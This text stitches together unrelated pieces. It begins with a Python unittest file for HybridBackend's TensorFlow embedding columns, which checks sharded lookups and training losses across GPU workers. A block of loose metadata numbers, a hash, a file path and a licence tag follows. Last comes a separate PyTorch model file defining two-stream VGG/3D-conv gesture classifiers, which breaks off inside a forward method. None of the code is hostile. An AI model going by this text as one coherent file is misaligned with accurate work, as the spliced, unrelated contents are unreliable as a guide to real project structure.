from __future__ import division
from __future__ import print_function
import numpy as np
import os
import hybridbackend.test as hbtest
import unittest
# pylint: disable=missing-docstring
# pylint: disable=import-outside-toplevel
def _test_get_dense_tensor(_):
  """Look up a sparse id batch through one embedding column and return
  the dense mean-combined result (the worker-rank argument is unused in
  this unsharded case)."""
  import tensorflow as tf
  import hybridbackend.tensorflow as hb

  # Inputs.
  vocabulary_size = 3
  sparse_input = tf.SparseTensorValue(
      indices=((0, 0), (1, 0), (1, 4), (3, 0)),
      values=(2, 0, 1, 1),
      dense_shape=(4, 5))

  # Embedding variable.
  embedding_dimension = 2
  embedding_values = (
      (1., 2.),  # id 0
      (3., 5.),  # id 1
      (7., 11.)  # id 2
  )

  def _initializer(shape, dtype, partition_info):
    # Doubles as an assertion on how the embedding variable is created.
    np.testing.assert_equal((vocabulary_size, embedding_dimension), shape)
    np.testing.assert_equal(tf.float32, dtype)
    np.testing.assert_equal(partition_info, None)
    return embedding_values

  with tf.Graph().as_default():
    with hb.scope():
      # Build columns.
      categorical_column = tf.feature_column.categorical_column_with_identity(
          key='aaa', num_buckets=vocabulary_size)
      emb_col = tf.feature_column.embedding_column(
          categorical_column,
          embedding_dimension,
          initializer=_initializer,
          combiner='mean')
      # Provide sparse input and get dense result.
      embedding_lookup = hb.keras.layers.DenseFeatures(
          [emb_col])({'aaa': sparse_input})
      with hb.train.monitored_session() as sess:
        return sess.run(embedding_lookup)
def _test_get_dense_tensor_sharded(rank):
  """Like _test_get_dense_tensor, but each worker initializes only its
  shard of the embedding table: rank 0 gets ids {0, 2}, rank 1 gets id {1}.
  """
  import tensorflow as tf
  import hybridbackend.tensorflow as hb

  # Inputs.
  vocabulary_size = 3
  sparse_input = tf.SparseTensorValue(
      indices=((0, 0), (1, 0), (1, 4), (3, 0)),
      values=(2, 0, 1, 1),
      dense_shape=(4, 5))

  # Embedding variable.
  embedding_dimension = 2
  embedding_values_0 = (
      (1., 2.),  # id 0
      (7., 11.),  # id 2
  )
  embedding_values_1 = (
      (3., 5.),  # id 1
  )

  def _initializer_0(shape, dtype, partition_info):
    # Rank-0 shard holds 2 rows.
    np.testing.assert_equal((2, embedding_dimension), shape)
    np.testing.assert_equal(tf.float32, dtype)
    np.testing.assert_equal(partition_info, None)
    return embedding_values_0

  def _initializer_1(shape, dtype, partition_info):
    # Rank-1 shard holds 1 row.
    np.testing.assert_equal((1, embedding_dimension), shape)
    np.testing.assert_equal(tf.float32, dtype)
    np.testing.assert_equal(partition_info, None)
    return embedding_values_1

  with tf.Graph().as_default():
    with hb.scope():
      categorical_column = tf.feature_column.categorical_column_with_identity(
          key='aaa', num_buckets=vocabulary_size)
      emb_col = tf.feature_column.embedding_column(
          categorical_column,
          embedding_dimension,
          initializer=_initializer_0 if rank == 0 else _initializer_1,
          combiner='mean')
      # Provide sparse input and get dense result.
      embedding_lookup = hb.keras.layers.DenseFeatures(
          [emb_col])({'aaa': sparse_input})
      with hb.train.monitored_session() as sess:
        return sess.run(embedding_lookup)
def _test_get_dense_tensor_with_varscope(rank):
  """Sharded lookup where the embedding variable is additionally split by a
  min/max variable partitioner inside a variable scope; rank 0's shard is
  partitioned row-by-row (initializer reads partition_info.var_offset)."""
  import tensorflow as tf
  import hybridbackend.tensorflow as hb

  # Inputs.
  vocabulary_size = 3
  sparse_input = tf.SparseTensorValue(
      indices=((0, 0), (1, 0), (1, 4), (3, 0)),
      values=(2, 0, 1, 1),
      dense_shape=(4, 5))

  # Embedding variable.
  embedding_dimension = 2
  embedding_values_0 = (
      (1., 2.),  # id 0
      (7., 11.),  # id 2
  )
  embedding_values_1 = (
      (3., 5.),  # id 1
  )

  def _initializer_0(shape, dtype, partition_info):
    # Called once per 1-row partition; selects the row by var_offset.
    np.testing.assert_equal((1, embedding_dimension), shape)
    np.testing.assert_equal(tf.float32, dtype)
    return [embedding_values_0[partition_info.var_offset[0]]]

  def _initializer_1(shape, dtype, partition_info):
    del partition_info
    np.testing.assert_equal((1, embedding_dimension), shape)
    np.testing.assert_equal(tf.float32, dtype)
    return embedding_values_1

  with tf.Graph().as_default():
    with hb.scope():
      partitioner = tf.min_max_variable_partitioner(
          max_partitions=2, min_slice_size=4)
      with tf.variable_scope('test', partitioner=partitioner):
        categorical_column = tf.feature_column.categorical_column_with_identity(
            key='aaa', num_buckets=vocabulary_size)
        emb_col = tf.feature_column.embedding_column(
            categorical_column,
            embedding_dimension,
            initializer=_initializer_0 if rank == 0 else _initializer_1,
            combiner='mean')
        # Provide sparse input and get dense result.
        embedding_lookup = hb.keras.layers.DenseFeatures(
            [emb_col])({'aaa': sparse_input})
        with hb.train.monitored_session() as sess:
          return sess.run(embedding_lookup)
def _test_embedding_column_with_optimizer(_, lr):
  """Train four embedding columns with Adam at learning rate `lr` for 100
  steps (num_groups=None, i.e. no lookup coalescing) and return the last
  observed loss value."""
  import tensorflow as tf
  import hybridbackend.tensorflow as hb

  with tf.Graph().as_default():
    with hb.scope(seed=42):
      # Four identity categorical columns with constant-initialized embeddings.
      columns = [
          tf.feature_column.embedding_column(
              tf.feature_column.categorical_column_with_identity(
                  key='ad0', num_buckets=10, default_value=0),
              dimension=20,
              initializer=tf.constant_initializer(0.5)),
          tf.feature_column.embedding_column(
              tf.feature_column.categorical_column_with_identity(
                  key='ad1', num_buckets=10, default_value=0),
              dimension=30,
              initializer=tf.constant_initializer(0.5)),
          tf.feature_column.embedding_column(
              tf.feature_column.categorical_column_with_identity(
                  key='ad2', num_buckets=10, default_value=0),
              dimension=40,
              initializer=tf.constant_initializer(0.5)),
          tf.feature_column.embedding_column(
              tf.feature_column.categorical_column_with_identity(
                  key='user0', num_buckets=10, default_value=0),
              dimension=20,
              initializer=tf.constant_initializer(0.5)),
      ]
      features = {
          'ad0': tf.constant([0, 1, 3, 2]),
          'ad1': tf.constant([1, 5, 3, 4]),
          'ad2': tf.constant([5, 2, 7, 4]),
          'user0': tf.constant([2, 5, 4, 7])
      }
      out_emb = hb.keras.layers.DenseFeatures(
          columns, num_groups=None)(features)
      loss = tf.reduce_mean(out_emb)
      opt = tf.train.AdamOptimizer(lr)
      step = tf.train.get_or_create_global_step()
      train_op = opt.minimize(loss, global_step=step)
      final_loss = None
      # StopAtStepHook bounds the run at 100 steps; NanTensorHook aborts
      # if the loss diverges.
      with hb.train.monitored_session(
          hooks=[
              opt.make_session_run_hook(),
              tf.train.StopAtStepHook(last_step=100),
              tf.train.NanTensorHook(loss),
              tf.train.LoggingTensorHook(
                  tensors={'loss': loss, 'step': step},
                  every_n_iter=20)]) as sess:
        while not sess.should_stop():
          # Loss is sampled before each training step.
          final_loss = sess.run(loss)
          sess.run(train_op)
      return final_loss
def _test_get_dense_tensor_disable_concat(_):
  """Look up two embedding columns with emb_enable_concat=False and return
  the result (output concatenation across columns disabled in hb.scope)."""
  import tensorflow as tf
  import hybridbackend.tensorflow as hb

  with tf.Graph().as_default():
    with hb.scope(emb_enable_concat=False):
      columns = [
          tf.feature_column.embedding_column(
              tf.feature_column.categorical_column_with_identity(
                  key='ad0', num_buckets=10, default_value=0),
              dimension=20,
              initializer=tf.constant_initializer(0.5)),
          tf.feature_column.embedding_column(
              tf.feature_column.categorical_column_with_identity(
                  key='user0', num_buckets=10, default_value=0),
              dimension=20,
              initializer=tf.constant_initializer(0.5)),
      ]
      # 'ad0' is fed as a sparse tensor, 'user0' as a dense one.
      features = {
          'ad0': tf.sparse.SparseTensor(
              values=[0, 1, 3, 2],
              indices=[[0, 0], [0, 1], [1, 0], [1, 1]],
              dense_shape=[2, 2]),
          'user0': tf.constant([2, 5, 4, 7])
      }
      embs = hb.keras.layers.DenseFeatures(columns)(features)
      with hb.train.monitored_session() as sess:
        return sess.run(embs)
def _test_embedding_column_with_coalescing(_, lr):
  """Same training setup as _test_embedding_column_with_optimizer, but with
  lookup coalescing enabled (num_groups=2) and NCCL as the communicator;
  returns the last observed loss after 100 Adam steps."""
  # Must be set before hybridbackend is imported.
  os.environ['HYBRIDBACKEND_DEFAULT_COMM'] = 'NCCL'
  import tensorflow as tf
  import hybridbackend.tensorflow as hb

  with tf.Graph().as_default():
    with hb.scope(seed=42):
      columns = [
          tf.feature_column.embedding_column(
              tf.feature_column.categorical_column_with_identity(
                  key='ad0', num_buckets=10, default_value=0),
              dimension=20,
              initializer=tf.constant_initializer(0.5)),
          tf.feature_column.embedding_column(
              tf.feature_column.categorical_column_with_identity(
                  key='ad1', num_buckets=10, default_value=0),
              dimension=30,
              initializer=tf.constant_initializer(0.5)),
          tf.feature_column.embedding_column(
              tf.feature_column.categorical_column_with_identity(
                  key='ad2', num_buckets=10, default_value=0),
              dimension=40,
              initializer=tf.constant_initializer(0.5)),
          tf.feature_column.embedding_column(
              tf.feature_column.categorical_column_with_identity(
                  key='user0', num_buckets=10, default_value=0),
              dimension=20,
              initializer=tf.constant_initializer(0.5)),
      ]
      features = {
          'ad0': tf.constant([0, 1, 3, 2]),
          'ad1': tf.constant([1, 5, 3, 4]),
          'ad2': tf.constant([5, 2, 7, 4]),
          'user0': tf.constant([2, 5, 4, 7])
      }
      # num_groups=2 coalesces the four lookups into two groups.
      out_emb = hb.keras.layers.DenseFeatures(columns, num_groups=2)(features)
      loss = tf.reduce_mean(out_emb)
      opt = tf.train.AdamOptimizer(lr)
      step = tf.train.get_or_create_global_step()
      train_op = opt.minimize(loss, global_step=step)
      final_loss = None
      with hb.train.monitored_session(
          hooks=[
              opt.make_session_run_hook(),
              tf.train.StopAtStepHook(last_step=100),
              tf.train.NanTensorHook(loss),
              tf.train.LoggingTensorHook(
                  tensors={'loss': loss, 'step': step},
                  every_n_iter=20)]) as sess:
        while not sess.should_stop():
          final_loss = sess.run(loss)
          sess.run(train_op)
      return final_loss
def _test_embedding_column_with_function(_, lr):
  """Same training setup, but the graph is built inside an @hb.function
  decorated builder (seed=42, emb_num_groups=2) instead of hb.scope;
  returns the last observed loss after 100 Adam steps."""
  # Must be set before hybridbackend is imported.
  os.environ['HYBRIDBACKEND_DEFAULT_COMM'] = 'NCCL'
  import tensorflow as tf
  import hybridbackend.tensorflow as hb

  @hb.function(seed=42, emb_num_groups=2)
  def train_fn():
    # Builds columns, features, loss and the train op; returns (loss, train_op).
    columns = [
        tf.feature_column.embedding_column(
            tf.feature_column.categorical_column_with_identity(
                key='ad0', num_buckets=10, default_value=0),
            dimension=20,
            initializer=tf.constant_initializer(0.5)),
        tf.feature_column.embedding_column(
            tf.feature_column.categorical_column_with_identity(
                key='ad1', num_buckets=10, default_value=0),
            dimension=30,
            initializer=tf.constant_initializer(0.5)),
        tf.feature_column.embedding_column(
            tf.feature_column.categorical_column_with_identity(
                key='ad2', num_buckets=10, default_value=0),
            dimension=40,
            initializer=tf.constant_initializer(0.5)),
        tf.feature_column.embedding_column(
            tf.feature_column.categorical_column_with_identity(
                key='user0', num_buckets=10, default_value=0),
            dimension=20,
            initializer=tf.constant_initializer(0.5)),
    ]
    features = {
        'ad0': tf.constant([0, 1, 3, 2]),
        'ad1': tf.constant([1, 5, 3, 4]),
        'ad2': tf.constant([5, 2, 7, 4]),
        'user0': tf.constant([2, 5, 4, 7])
    }
    out_emb = hb.keras.layers.DenseFeatures(columns)(features)
    loss = tf.reduce_mean(out_emb)
    opt = tf.train.AdamOptimizer(lr)
    step = tf.train.get_or_create_global_step()
    return loss, opt.minimize(loss, global_step=step)

  loss, train_op = train_fn()
  final_loss = None
  with hb.train.monitored_session(
      hooks=[
          tf.train.StopAtStepHook(last_step=100),
          tf.train.NanTensorHook(loss),
          tf.train.LoggingTensorHook(
              tensors={'loss': loss},
              every_n_iter=20)]) as sess:
    while not sess.should_stop():
      final_loss = sess.run(loss)
      sess.run(train_op)
  return final_loss
def _test_embedding_column_with_function_unique(_, lr):
  """Like _test_embedding_column_with_function, but additionally enables
  id de-duplication for the 'ad0' column via emb_unique={'ad0': True};
  returns the last observed loss after 100 Adam steps."""
  # Must be set before hybridbackend is imported.
  os.environ['HYBRIDBACKEND_DEFAULT_COMM'] = 'NCCL'
  import tensorflow as tf
  import hybridbackend.tensorflow as hb

  @hb.function(seed=42, emb_num_groups=2, emb_unique={'ad0': True})
  def train_fn():
    # Builds columns, features, loss and the train op; returns (loss, train_op).
    columns = [
        tf.feature_column.embedding_column(
            tf.feature_column.categorical_column_with_identity(
                key='ad0', num_buckets=10, default_value=0),
            dimension=20,
            initializer=tf.constant_initializer(0.5)),
        tf.feature_column.embedding_column(
            tf.feature_column.categorical_column_with_identity(
                key='ad1', num_buckets=10, default_value=0),
            dimension=30,
            initializer=tf.constant_initializer(0.5)),
        tf.feature_column.embedding_column(
            tf.feature_column.categorical_column_with_identity(
                key='ad2', num_buckets=10, default_value=0),
            dimension=40,
            initializer=tf.constant_initializer(0.5)),
        tf.feature_column.embedding_column(
            tf.feature_column.categorical_column_with_identity(
                key='user0', num_buckets=10, default_value=0),
            dimension=20,
            initializer=tf.constant_initializer(0.5)),
    ]
    features = {
        'ad0': tf.constant([0, 1, 3, 2]),
        'ad1': tf.constant([1, 5, 3, 4]),
        'ad2': tf.constant([5, 2, 7, 4]),
        'user0': tf.constant([2, 5, 4, 7])
    }
    out_emb = hb.keras.layers.DenseFeatures(columns)(features)
    loss = tf.reduce_mean(out_emb)
    opt = tf.train.AdamOptimizer(lr)
    step = tf.train.get_or_create_global_step()
    return loss, opt.minimize(loss, global_step=step)

  loss, train_op = train_fn()
  final_loss = None
  with hb.train.monitored_session(
      hooks=[
          tf.train.StopAtStepHook(last_step=100),
          tf.train.NanTensorHook(loss),
          tf.train.LoggingTensorHook(
              tensors={'loss': loss},
              every_n_iter=20)]) as sess:
    while not sess.should_stop():
      final_loss = sess.run(loss)
      sess.run(train_op)
  return final_loss
def _test_get_dense_tensor_with_segment_rank(rank):
  """Sharded lookup on a rank-3 sparse input (dense_shape (4, 2, 3)) with
  emb_segment_rank={'aaa': 1} set via @hb.function; returns the dense
  lookup result."""
  import tensorflow as tf
  import hybridbackend.tensorflow as hb

  # Inputs.
  vocabulary_size = 3
  sparse_input = tf.SparseTensorValue(
      indices=((0, 1, 1), (0, 1, 2), (1, 1, 1), (1, 1, 2)),
      values=(2, 0, 1, 1),
      dense_shape=(4, 2, 3))

  # Embedding variable.
  embedding_dimension = 2
  embedding_values_0 = (
      (1., 2.),  # id 0
      (7., 11.),  # id 2
  )
  embedding_values_1 = (
      (3., 5.),  # id 1
  )

  def _initializer_0(shape, dtype, partition_info):
    # Rank-0 shard holds 2 rows.
    np.testing.assert_equal((2, embedding_dimension), shape)
    np.testing.assert_equal(tf.float32, dtype)
    np.testing.assert_equal(partition_info, None)
    return embedding_values_0

  def _initializer_1(shape, dtype, partition_info):
    # Rank-1 shard holds 1 row.
    np.testing.assert_equal((1, embedding_dimension), shape)
    np.testing.assert_equal(tf.float32, dtype)
    np.testing.assert_equal(partition_info, None)
    return embedding_values_1

  @hb.function(emb_segment_rank={'aaa': 1})
  def lookup_fn():
    categorical_column = tf.feature_column.categorical_column_with_identity(
        key='aaa', num_buckets=vocabulary_size)
    emb_col = tf.feature_column.embedding_column(
        categorical_column,
        embedding_dimension,
        initializer=_initializer_0 if rank == 0 else _initializer_1,
        combiner='mean')
    return hb.keras.layers.DenseFeatures([emb_col])({'aaa': sparse_input})

  with tf.Graph().as_default():
    embs = lookup_fn()
    with hb.train.monitored_session() as sess:
      return sess.run(embs)
def _test_shared_embedding_column(_, lr):
  r'''Spawned-worker body: train embedding + shared-embedding columns.

  Args:
    _: worker rank (unused).
    lr: learning rate for the Adam optimizer.

  Returns:
    The last loss value observed before the session stopped
    (StopAtStepHook ends the run after 100 global steps).
  '''
  import tensorflow as tf
  import hybridbackend.tensorflow as hb
  with tf.Graph().as_default():
    with hb.scope(seed=42):
      # Two ordinary embedding columns with constant-initialized tables...
      columns = [
        tf.feature_column.embedding_column(
          tf.feature_column.categorical_column_with_identity(
            key='ad1', num_buckets=10, default_value=0),
          dimension=30,
          initializer=tf.constant_initializer(0.5)),
        tf.feature_column.embedding_column(
          tf.feature_column.categorical_column_with_identity(
            key='ad2', num_buckets=10, default_value=0),
          dimension=40,
          initializer=tf.constant_initializer(0.5)),
      ]
      # ...plus one embedding table shared by the 'ad0' and 'user0' columns.
      columns += tf.feature_column.shared_embedding_columns(
        [
          tf.feature_column.categorical_column_with_identity(
            key='ad0', num_buckets=10, default_value=0),
          tf.feature_column.categorical_column_with_identity(
            key='user0', num_buckets=10, default_value=0)],
        dimension=20,
        initializer=tf.constant_initializer(0.5))
      features = {
        'ad0': tf.constant([0, 1, 3, 2]),
        'ad1': tf.constant([1, 5, 3, 4]),
        'ad2': tf.constant([5, 2, 7, 4]),
        'user0': tf.constant([2, 5, 4, 7])
      }
      out_emb = hb.keras.layers.DenseFeatures(columns)(features)
      loss = tf.reduce_mean(out_emb)
      opt = tf.train.AdamOptimizer(lr)
      step = tf.train.get_or_create_global_step()
      train_op = opt.minimize(loss, global_step=step)
      final_loss = None
      with hb.train.monitored_session(
          hooks=[
            opt.make_session_run_hook(),
            tf.train.StopAtStepHook(last_step=100),
            tf.train.NanTensorHook(loss),
            tf.train.LoggingTensorHook(
              tensors={'loss': loss, 'step': step},
              every_n_iter=20)]) as sess:
        while not sess.should_stop():
          # Record the loss *before* applying the update so the returned
          # value matches the step count at which training stopped.
          final_loss = sess.run(loss)
          sess.run(train_op)
      return final_loss
@unittest.skipUnless(
  os.getenv('HYBRIDBACKEND_WITH_CUDA') == 'ON', 'GPU required')
class DenseFeaturesTest(unittest.TestCase):
  '''Tests for embedding columns.

  Each test spawns one or two worker processes (`hbtest.Spawn`) that run
  the module-level `_test_*` helpers and checks the returned results.
  '''
  def setUp(self):  # pylint: disable=invalid-name
    # Expose two devices to the spawned workers.
    os.environ['CUDA_VISIBLE_DEVICES'] = '0,1'
  def test_get_dense_tensor(self):
    results = hbtest.Spawn()(_test_get_dense_tensor)
    np.testing.assert_allclose(
      results[0],
      [[7., 11.],
       [2., 3.5],
       [0., 0.],
       [3., 5.]],
      rtol=1e-6)
  def test_get_dense_tensor_sharded(self):
    # Two workers; both must observe identical lookup results.
    results = hbtest.Spawn(2)(_test_get_dense_tensor_sharded)
    np.testing.assert_allclose(
      results[0],
      [[7., 11.],
       [2., 3.5],
       [0., 0.],
       [3., 5.]],
      rtol=1e-6)
    np.testing.assert_allclose(
      results[1],
      [[7., 11.],
       [2., 3.5],
       [0., 0.],
       [3., 5.]],
      rtol=1e-6)
  def test_get_dense_tensor_with_varscope(self):
    results = hbtest.Spawn(2)(_test_get_dense_tensor_with_varscope)
    np.testing.assert_allclose(
      results[0],
      [[7., 11.],
       [2., 3.5],
       [0., 0.],
       [3., 5.]],
      rtol=1e-6)
    np.testing.assert_allclose(
      results[1],
      [[7., 11.],
       [2., 3.5],
       [0., 0.],
       [3., 5.]],
      rtol=1e-6)
  def test_embedding_column_with_optimizer(self):
    # Both workers should converge to the same final loss value.
    results = hbtest.Spawn(2)(
      lambda rank: _test_embedding_column_with_optimizer(rank, 0.0001))
    np.testing.assert_allclose(results[0], 0.490101, rtol=1e-6)
    np.testing.assert_allclose(results[1], 0.490101, rtol=1e-6)
  def test_get_dense_tensor_disable_concat(self):
    # With concat disabled, the layer returns one tensor per column.
    results = hbtest.Spawn()(_test_get_dense_tensor_disable_concat)
    np.testing.assert_equal(len(results[0]), 2)
  def test_embedding_column_with_coalescing(self):
    results = hbtest.Spawn(2)(
      lambda rank: _test_embedding_column_with_coalescing(rank, 0.0001))
    np.testing.assert_allclose(results[0], 0.490101, rtol=1e-6)
    np.testing.assert_allclose(results[1], 0.490101, rtol=1e-6)
  def test_embedding_column_function(self):
    results = hbtest.Spawn(2)(
      lambda rank: _test_embedding_column_with_function(rank, 0.0001))
    np.testing.assert_allclose(results[0], 0.490101, rtol=1e-6)
    np.testing.assert_allclose(results[1], 0.490101, rtol=1e-6)
  def test_embedding_column_function_unique(self):
    results = hbtest.Spawn(2)(
      lambda rank: _test_embedding_column_with_function_unique(rank, 0.0001))
    np.testing.assert_allclose(results[0], 0.490101, rtol=1e-6)
    np.testing.assert_allclose(results[1], 0.490101, rtol=1e-6)
  def test_get_dense_tensor_with_segment_rank(self):
    results = hbtest.Spawn(2)(_test_get_dense_tensor_with_segment_rank)
    np.testing.assert_allclose(
      results[0],
      [[0., 0.],
       [4., 6.5],
       [0., 0.],
       [3., 5.],
       [0., 0.],
       [0., 0.],
       [0., 0.],
       [0., 0.]],
      rtol=1e-6)
    np.testing.assert_allclose(
      results[1],
      [[0., 0.],
       [4., 6.5],
       [0., 0.],
       [3., 5.],
       [0., 0.],
       [0., 0.],
       [0., 0.],
       [0., 0.]],
      rtol=1e-6)
  def test_shared_embedding_column(self):
    results = hbtest.Spawn(2)(
      lambda rank: _test_shared_embedding_column(rank, 0.0001))
    np.testing.assert_allclose(results[0], 0.490101, rtol=1e-6)
    np.testing.assert_allclose(results[1], 0.490101, rtol=1e-6)
# pylint: enable=missing-docstring


if __name__ == '__main__':
  # hbtest entry point; results are written next to this file as '<file>.xml'.
  hbtest.main(f'{__file__}.xml')
| 33.72
| 80
| 0.649786
| 2,867
| 21,918
| 4.71887
| 0.08685
| 0.033927
| 0.056545
| 0.049967
| 0.896593
| 0.885283
| 0.870944
| 0.861926
| 0.841452
| 0.83783
| 0
| 0.043458
| 0.222055
| 21,918
| 649
| 81
| 33.771957
| 0.749985
| 0.053837
| 0
| 0.821691
| 0
| 0
| 0.019821
| 0.004883
| 0
| 0
| 0
| 0
| 0.068015
| 1
| 0.056985
| false
| 0
| 0.049632
| 0
| 0.145221
| 0.001838
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
49769e87e9073c01a246a5ab14f42dcea1f551d1
| 7,534
|
py
|
Python
|
model/model.py
|
Seraphir/gesture_recognition
|
06ab1a8e7601d52efed02303630abec2e15bad50
|
[
"MIT"
] | null | null | null |
model/model.py
|
Seraphir/gesture_recognition
|
06ab1a8e7601d52efed02303630abec2e15bad50
|
[
"MIT"
] | null | null | null |
model/model.py
|
Seraphir/gesture_recognition
|
06ab1a8e7601d52efed02303630abec2e15bad50
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
from base import BaseModel
from torchvision.models import resnet50
# VGG-style layer specs consumed by make_layers(): integer entries are
# Conv2d output-channel counts, 'M' inserts a 2x2 max-pool.  Keys follow
# the usual VGG naming (A/B/D/E); only 'D' (the 16-layer config) is used
# by the models in this file.
cfgs = {
    'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
    'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
    'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
    'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],
}
class C3DVGG(nn.Module):
    """Two-stream gesture classifier: a 2D VGG-D stream and a C3D-style
    3D-conv stream, fused by concatenation before a shared MLP head.

    Args:
        num_classes: size of the final output layer.
        batch_norm: whether the 2D stream uses BatchNorm2d.
        finetune: optional checkpoint path; when given, weights are loaded
            from the checkpoint's 'state_dict' entry after initialization.
    """
    def __init__(self, num_classes=10, batch_norm=True, finetune=None):
        super().__init__()
        # 2D stream: VGG 'D' feature extractor -> 7x7 pool -> 2048-d fc.
        self.net2d = make_layers(cfgs['D'], batch_norm=batch_norm)
        self.avgpool = nn.AdaptiveAvgPool2d((7, 7))
        self.lc2d = nn.Sequential(
            nn.Linear(512 * 7 * 7, 2048),
            nn.ReLU(True)
        )
        # 3D stream: stacked Conv3d/MaxPool3d blocks (C3D-like topology).
        self.net3d = nn.Sequential(
            nn.Conv3d(3, 64, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)),
            nn.Conv3d(64, 128, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)),
            nn.Conv3d(128, 256, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.Conv3d(256, 256, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)),
            nn.Conv3d(256, 512, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.Conv3d(512, 512, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)),
            nn.Conv3d(512, 512, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.Conv3d(512, 512, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2), padding=(0, 1, 1)),
        )
        # 3D features flattened to 8192 -> 2048-d fc (see forward()).
        self.lc3d = nn.Sequential(
            nn.Linear(8192, 2048),
            nn.ReLU(True)
        )
        # Head consumes the 2048 + 2048 = 4096-d fused vector.
        self.classifier = nn.Sequential(
            nn.Linear(4096, 4096),
            nn.ReLU(True),
            nn.Dropout(),
            nn.Linear(4096, 4096),
            nn.ReLU(True),
            nn.Dropout(),
            nn.Linear(4096, num_classes),
        )
        self._initialize_weights()
        if finetune is not None:
            checkpoint = torch.load(finetune)
            self.load_state_dict(checkpoint['state_dict'])
            print("loaded {}".format(finetune))

    def forward(self, x1, x2):
        # x1: 2D-image input; x2: clip input for the 3D stream.
        x1 = self.net2d(x1)
        x1 = self.avgpool(x1)
        x1 = torch.flatten(x1, 1)
        x1 = self.lc2d(x1)
        x2 = self.net3d(x2)
        # Assumes net3d output has exactly 8192 elements per sample, which
        # depends on the input clip size — TODO confirm against the loader.
        x2 = x2.view(-1, 8192)
        x2 = self.lc3d(x2)
        x = torch.cat((x1, x2), dim=1)
        x = self.classifier(x)
        # F.log_softmax(x, dim=1)
        return x

    def _initialize_weights(self):
        # Per-layer-type initialization; note Conv3d biases are left at
        # their default init (only the weight is re-initialized).
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
                if m.bias is not None:
                    nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.BatchNorm2d):
                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.Linear):
                nn.init.normal_(m.weight, 0, 0.01)
                nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.Conv3d):
                torch.nn.init.kaiming_normal_(m.weight)
            elif isinstance(m, nn.BatchNorm3d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()
class SimpleC3DVGG(nn.Module):
    """Lighter two-stream variant of C3DVGG: the per-stream fc layers are
    dropped and raw flattened features are fed straight to the classifier.

    Args:
        num_classes: size of the final output layer.
        batch_norm: whether the 2D stream uses BatchNorm2d.
        finetune: optional checkpoint path; when given, weights are loaded
            from the checkpoint's 'state_dict' entry after initialization.
    """
    def __init__(self, num_classes=10, batch_norm=True, finetune=None):
        super().__init__()
        # 2D stream: VGG 'D' feature extractor -> fixed 7x7 pool.
        self.net2d = make_layers(cfgs['D'], batch_norm=batch_norm)
        self.avgpool = nn.AdaptiveAvgPool2d((7, 7))
        # 3D stream: same Conv3d/MaxPool3d stack as C3DVGG.
        self.net3d = nn.Sequential(
            nn.Conv3d(3, 64, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)),
            nn.Conv3d(64, 128, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)),
            nn.Conv3d(128, 256, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.Conv3d(256, 256, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)),
            nn.Conv3d(256, 512, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.Conv3d(512, 512, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)),
            nn.Conv3d(512, 512, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.Conv3d(512, 512, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2), padding=(0, 1, 1)),
        )
        # 33280 = 25088 (2D: 512*7*7) + 8192 (3D) concatenated features.
        self.classifier = nn.Sequential(
            nn.Linear(33280, 2048),
            nn.ReLU(True),
            nn.Dropout(0.85),  # very aggressive dropout on the head
            nn.Linear(2048, num_classes),
        )
        self._initialize_weights()
        if finetune is not None:
            checkpoint = torch.load(finetune)
            self.load_state_dict(checkpoint['state_dict'])
            print("loaded {}".format(finetune))

    def forward(self, x1, x2):
        # x1: 2D-image input; x2: clip input for the 3D stream.
        x1 = self.net2d(x1)
